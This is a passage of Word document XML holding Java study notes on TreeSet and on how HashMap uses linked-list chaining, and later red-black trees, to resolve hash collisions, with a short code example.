          <w:numId w:val="7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deal for scenarios where sorting is important (e.g., maintaining an ordered list of unique items such as scores, names, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BAE8D" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7062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18C6C8A">
          <v:rect id="_x0000_i1488" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D43915" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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389E96CC" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>avoid duplicate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store data in a sorted manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the best collection to use is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It automatically handles both the elimination of duplicates and sorting of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A770D84" w14:textId="6D26D408"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B13440F">
          <v:rect id="_x0000_i1489" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F6BEE" w14:textId="77777777" w:rsidR="00E8057F" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8057F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc196307626"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In which scenarios Linked list comes into fixture in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="59E858A3" w14:textId="3C200F57" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">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w:t>
      </w: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a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comes into the picture when </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occur in the map. This scenario is handled using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</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Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for large chains) to store multiple elements that hash to the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D4F2A" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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Understanding HashMap Internal Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2D1F4" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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internally uses an array of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slots</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) to store the entries (key-value pairs). Each bucket is chosen based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D535B" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> happen when multiple keys have the same hash value and end up in the same bucket. To handle such collisions, Java's </w:t>
      </w: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uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for high collision chains) to store these elements in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23C278" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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ow Does LinkedList Fit into HashMap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE84B76" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 Collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When two or more keys produce the same hash value (i.e., they map to the same bucket), the </w:t>
      </w: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stores the entries in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at that bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA3CDDA" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A bucket is essentially a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that holds the key-value pairs that are hashed to the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201CF1D3" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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haining in HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When multiple entries with the same hash code end up in the same bucket, the HashMap resolves this collision by maintaining a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1175E606" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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linked list stores the key-value pairs, with each entry in the list pointing to the next entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73063AC2" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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erformance of Chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510928B9" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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the case of collisions, the time complexity for searching or inserting an element becomes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in the worst case, where n is the number of elements in the bucket (due to traversal through the linked list).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C31F9" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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owever, if the hash function disperses the keys uniformly, and the number of elements in a bucket is small, the time complexity remains close to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for most operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC60575" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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shold for Tree Conversion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Starting from Java 8, if the number of elements in a bucket exceeds a certain threshold (by default, 8), and the total number of buckets exceeds a certain size (by default, 64), the linked list is converted to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>balanced tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Red-Black Tree). This conversion improves performance by reducing the worst-case lookup time from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to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>O(log n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for large chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC37D7" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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HashMap with LinkedList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8700E2" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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et's consider a scenario where we have multiple keys hashing to the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239A669" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1C87B" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57651BAF" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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HashMapLinkedListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE3E2DD" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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2D830D68" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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e a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A60F72" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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HashMap&lt;String, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB58E3" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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07DD973" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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Inserting elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BFA94" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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one", "1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6198C586" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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two", "2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE83A4" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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three", "3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CFBE0" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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3079D49" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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Inserting a duplicate key to create a collision (same hash code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6629DC59" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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uno", "1"); // "uno" and "one" may have the same hash code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF73292" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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C5C0EFE" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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nt the HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7D4CF" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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HashMap: " + map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BB4F5" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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C09F7D8" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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575CEF7" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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e above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391CE18" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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one" and "uno" have the same hash code (based on the hash function used), both key-value pairs will end up in the same bucket. This bucket will internally maintain a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to store both the "one" and "uno" entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C4C01" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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ow LinkedList is Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CA1AC" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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HashMap will create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the bucket's index and store the following entries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53731F1F" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72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e, 1) → Points to → (uno, 1) (if they have the same hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DC7B9" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E63C76B" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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is used internally by </w:t>
      </w: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to resolve </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If multiple elements map to the same bucket (i.e., they have the same hash code), they are stored in a linked list.</w:t>
      </w:r>
    </w:p>
